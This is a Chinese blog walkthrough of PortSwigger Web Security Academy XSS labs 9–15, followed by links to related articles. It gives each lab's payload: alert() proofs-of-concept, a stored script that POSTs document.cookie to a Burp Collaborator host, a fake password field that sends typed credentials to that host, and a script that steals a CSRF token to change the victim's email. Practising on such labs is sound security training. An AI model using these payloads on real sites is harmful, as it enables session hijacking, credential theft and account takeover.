burp靶场xss漏洞(中级篇)下

原创 已于 2024-07-01 01:37:05 修改 · 756 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #安全 #前端

于 2024-06-30 23:59:18 首次发布

靶场地址

All labs | Web Security Academy

第九关:反射型( ' 转义)

1.在搜索框随机输入字符并用Burp抓包

2.测试不同字符在JavaScript字符串中的反映,发现查询结果被包裹在script标签中

而单引号会被转义为 \

3.构造payload跳出js模块,出现弹窗证明攻击成功

</script><script>alert(111)</script>

第十关:反射型(' 转义和 \ 编码)

1.在搜索框随机输入字符并用Burp抓包

2.测试不同字符在JavaScript字符串中的反映,发现查询结果被包裹在script标签中

单引号会被转义为 \

而反斜杠不被转义

3.构造payload跳出js模块,出现弹窗证明攻击成功

\'-alert(111)//

第十一关:存储型(' 和 \ 转义)

1.在评论区写个评论后在源码中查看评论内容所在的位置,发现评论的URL出现在onclick事件中

2.在website中构造payload来跳出js事件,即可通关

http://foo?&apos;-alert(1)-&apos;

3.返回评论页面点击名称触发弹窗

第十二关:反射型(模版文本)

1.在搜索框随机输入字符,发现该字符被包裹在js模版文本中

模板文本是用反勾字符分隔的字面量,允许多行字符串、使用嵌入表达式的字符串插值以及称为标记模板的特殊结构

2.构造payload,出现弹窗即可通关

${alert(1)}:$符可以替代执行的函数

第十三关:存储型(窃取 cookie)

1.在评论里直接插入payload,出现弹窗说明存在xss漏洞

<script>alert('111')</script>

2.打开客户端,复制payload

3.接着在评论里发布payload

<script> fetch('https://BURP-COLLABORATOR-SUBDOMAIN', {

method: 'POST',

mode: 'no-cors',

body:document.cookie });

</script>

4.返回客户端来获取受害者的cookie和secret值

5.抓包后利用受害者的cookie登录

6.点击forward后即可通关

第十四关:存储型(获取密码)

1.先打开客户端复制payload

2.在评论里插入payload

<input name=username id=username>

<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{

method:'POST',

mode: 'no-cors',

body:username.value+':'+this.value

});">

3.返回客户端查看受害者的密码

4.使用该密码登录即可通关

第十五关:存储型(执行 CSRF)

1.首先用所给的账户登录

2.更改邮箱并抓包,发现csrf值

3.在评论里插入payload后,即可通关

<script>

var req = new XMLHttpRequest();

req.onload = handleResponse;

req.open('get','/my-account',true);

req.send();

function handleResponse() {

var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];

var changeReq = new XMLHttpRequest();

changeReq.open('post', '/my-account/change-email', true);       changeReq.send('csrf='+token+'&email=test@test.com')

};

</script>

季柳东
关注
反射型xss漏洞总结和python脚本复现
Azehng的博客
10-21 746
content访问该页面,并以GET方式给content参数赋值,页面响应如下当我们输入,页面响应如下上面就是xss漏洞的体现场景,也算一种注入漏洞。跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
Appcms存储型XSS漏洞复现
钟言的博客
03-10 5139
为Appcms存储型XSS漏洞复现,采用多次注入的方式完成我们的payload注入,详细内容包含了环境介绍环境部署测试回显四、多次注入 1、第一条评论 2、第二条评论 3、管理员登录查看五、编写脚本获取cookie等内容
DVWA--反射型XSS(初中高)
firecjh的博客
06-09 547
选择“View Source”查看源程序,发现对“/”进行了替换,不能使用常用的绕过方法。
burp靶场--xss【1-15】
qq_33168924的博客
01-29 3077
跨站脚本 (XSS) 是一种通常出现在 Web 应用程序中的计算机安全漏洞XSS 允许攻击者将恶意代码注入网站,然后在访问该网站的任何人的浏览器中执行该代码。这可能允许攻击者窃取敏感信息,例如用户登录凭据,或执行其他恶意操作。XSS 攻击主要有 3 种类型:反射型 XSS:在反射型 XSS 攻击中,恶意代码嵌入到发送给受害者的链接中。当受害者点击链接时,代码就会在他们的浏览器中执行。例如,攻击者可以创建包含恶意 JavaScript 的链接,并将其通过电子邮件发送给受害者。
BurpSuit之XSS检测
无远弗届
03-10 6674
跨站脚本攻击(Cross Site Scripting)是一种将恶意Javascript代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。今天主要详细讲述如利用Burp+PhantomJS进行XSS检测。 环境准备 BP插件安装 在burpsuit的Extender模板下,找到BApp Store,搜索XSS Validator,进行安装即可。如下图所示: phantomjs安装...
DVWA系列(四)——使用Burpsuite进行存储型XSS(存储型跨站脚本攻击)
橘子女侠
05-05 2770
存储型XSS 长期存储于服务器端; 每次用户访问都会执行脚本代码; 1. 存储型XSS攻击图示 (1)获取被攻击者的cookie; 黑客首先向服务器发送js脚本; 服务器返回含有js脚本的页面;并将该页面存储在服务器上; 当被攻击方访问服务器时,服务器返回存储的js页面; 黑客接收到被攻击方的cookie; (2) 重定向到第三方网站; 黑客首先...
DVWA下的XSS漏洞通关练习
weixin_48609562的博客
06-15 784
XSS 介绍 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。 DOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。例如服务器端经常使用document.boby.innerHtml
网络安全基础技术扫盲 — 常见web漏洞XSS跨站脚本攻击
2401_84301853的博客
04-27 994
知识宝库在此藏,一键关注获宝藏首先我们了解一下原理,用一句话概括就是。在Web应用中,前端代码主要包括HTML、CSS和JavaScript。:HTML 用于描述网页的结构和内容,包括标签、元素、属性等。前端骨架(有很大关系,但不是该漏洞的利用核心)。:CSS用于定义网页的样式和布局。美化作用(和渗透关系不大):JavaScript是一种客户端脚本语言,用于实现动态效果和与用户的交互。恶意的JavaScript代码可以直接在用户的浏览器中执行,导致XSS攻击的发生。
DVWA靶场笔记之csrf漏洞原理
Alonegrief的博客
11-20 1520
DVWA漏洞源码分析——(三)csrf Csrf原理: Csrf中文称为跨站请求伪造,利用受害者未失效的身份认证信息(cookie,会话等)诱骗其点击恶意链接或者去访问攻击者构造的含有攻击代码的页面,在受害者不知情的情况下,以受害者的身份向服务器发送请求,从而达到一些非法操作(转账,改密)。 Csrf和xss的攻击方式有点相似,但是不同的是: (1) csrf需要登录后才能操作,xss不需要 (2) csrf是请求页面api来时先非法操作,xss是先当前页面植入js脚本来修改页面内容 例子: 这里我们用dv
DVWA(三)反射型XSSXSS(Reflected))
qq_42180996的博客
07-25 2768
反射型XSS 一、实验环境 二、实验原理 1.概念 2.xss漏洞类型 3.原理 4.原理图解 三、实验步骤 (一)Low级别 1.源码 2.正确输入 3.直接嵌入 4.元素事件之加载即弹窗 5.元素事件之登入超链接 6.元素事件之查找超链接图片 7.元素事件之点击即弹窗 8.重定向至百度 9.重定向至超链接 10.重定向至超链接图片 11.获取cook...
Burp自动化测试xss漏洞(phantomjs浏览器)
m0_65764670的博客
06-25 653
优点:使用burp自动测试xss漏洞速度会比自己手动快速缺点:会产生大量访问请求,如果是存储类型会污染网站如何避免:摸清网站的规则,自己写规则,在本地批量测试批量测试可以使用bp,验证使用phantomjs浏览器(成功会对其进行标记但在bp中需要安装插件),工具测试完成需要复测(弄完之后需要关闭插件否则会很慢)代理地址(浏览器没改就不改这是默认)和字符(可以改也可以默认)payload括号里大写部分是要执行的代码(可自行添加)
XSS漏洞总结 附带burp xss检测插件使用
weixin_52206305的博客
03-11 3727
注意:JavaScript加载外部的代码文件可以是任意扩展名(无扩展名也可以),如:
【亲测免费】 反射器(Reflector):实时检测XSS漏洞Burp Suite扩展
gitblog_00096的博客
05-17 658
反射器(Reflector):实时检测XSS漏洞Burp Suite扩展 1、项目介绍 reflector是一个强大的Burp Suite插件,专为Web应用安全测试而设计。它能在您浏览网站时实时探测反射型跨站脚本(XSS)漏洞,并提供一系列辅助功能,帮助您识别和分析潜在的安全风险。 2、项目技术分析 响应高亮:当找到反射点时,reflector会在响应标签中突出显示,使您能快速定位问题。 符...
Burpsuite检测xss漏洞burpsuite实战指南
最新发布
2301_79614903的博客
08-20 2023
XSS(跨站脚本攻击)漏洞是Web应用程序中最常见的漏洞之一,它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的,比如获取用户的cookie,导航到恶意网站,携带木马等。根据其触发方式的不同,通常分为反射型XSS、存储型XSS和DOM-base型XSS漏洞“注入理论”认为,所有的可输入参数,都是不可信任的。
burpsuite安全练兵场-客户端12】跨站点请求伪造CSRF-12个实验(全)
baimao__Ch的博客
06-19 1580
一、跨站点请求伪造(CSRF)1、简述:2、影响:3、原理:4、构造CSRF攻击实验1:无防御的CSRF漏洞5、利用CSRF6、针对CSRF的常见防御措施二、绕过CSRF令牌验证1、CSRF令牌2、CSRF令牌的验证取决于请求方法实验2:令牌验证取决于请求方法的CSRF3、CSRF令牌的验证取决于令牌是否存在实验3:CSRF,其中令牌验证取决于令牌是否存在4、CSRF令牌未绑定到用户会话实验4:令牌未绑定到用户会话的CSRF5、CSRF令牌绑定到非会话Cookie。
使用burpsuite进行自动化测试XSS漏洞的两种方法
Cwillchris的博客
07-08 1971
一、使用 burpsuite 进行自动化测试 XSS 漏洞我们使用之前搭建的DVWA靶机进行实验进入centos靶机,启动 apache 服务└─# systemctl start apache2进入kali拷贝 payload 字典到 root 目录下,字典可以使用 Kali 中自带的,也可以使用网上找的└─# cp /usr/share/wordlists/wfuzz/Injections/XSS.txt /root在火狐中访问: 192.168.98.66/DVWA-master/vulnerabil
burp suite 使用 xssvalidate
thatqier
04-11 1953
配置插件xssValidator使用插件代理功能(目的是抓取真实的http请求报文)配置好浏览器代理地址后发起请求,burp会捕获到请求,点击forward找到对应的请求历史记录,并发送到intruder配置payloads为xssValidator配置options的grep – match对应字符串的出处修改请求参数,并开始xss扫描查看单独的结果(有勾选的就是有xss漏洞的)把对话框出现的u...
burpsuite安全练兵场-客户端11】跨站点脚本XSS-20个实验(上)
m0_61869253的博客
05-27 490
blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)博主:网络安全领域狂热爱好者(承诺在优快云永久无偿分享文章)。!blog.csdnimg.cn/3e1c80dc452343c9b3e29c5030fa90b1.png)殊荣:优快云网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。!
我的BurpSuite挖漏洞的一些技巧
hackzkaq的博客
08-09 4473
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 关于”从burp的使用到支付和暴破“,也有一期视频教程,可以文末扫码领取 关联阅读: Burpsuite技巧 | 之加密密码爆破、带验证码爆破 渗透测试神器|一文带你精通Burp 一.前言 用了好久低版本的Burp, 最近发现Burp有个全新的改动,所以重新配置一下,然后记录了自己的过程,就打算分享一下自己平时利用Burpsuite进行挖洞的一些技巧。 二.Burp安装与破解 访问官网直接下载Mac OS的安装版:https://ports
BurpSuite插件Xss Scan - XSS漏洞扫描利器
Xss Scan tool是一款专为Web安全领域设计的工具,它是一款可以嵌入到Burp Suite中的插件,旨在帮助安全研究人员、渗透测试员以及开发者自动识别和分析Web应用程序中潜在的跨站脚本攻击(XSS漏洞。在Web应用程序...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值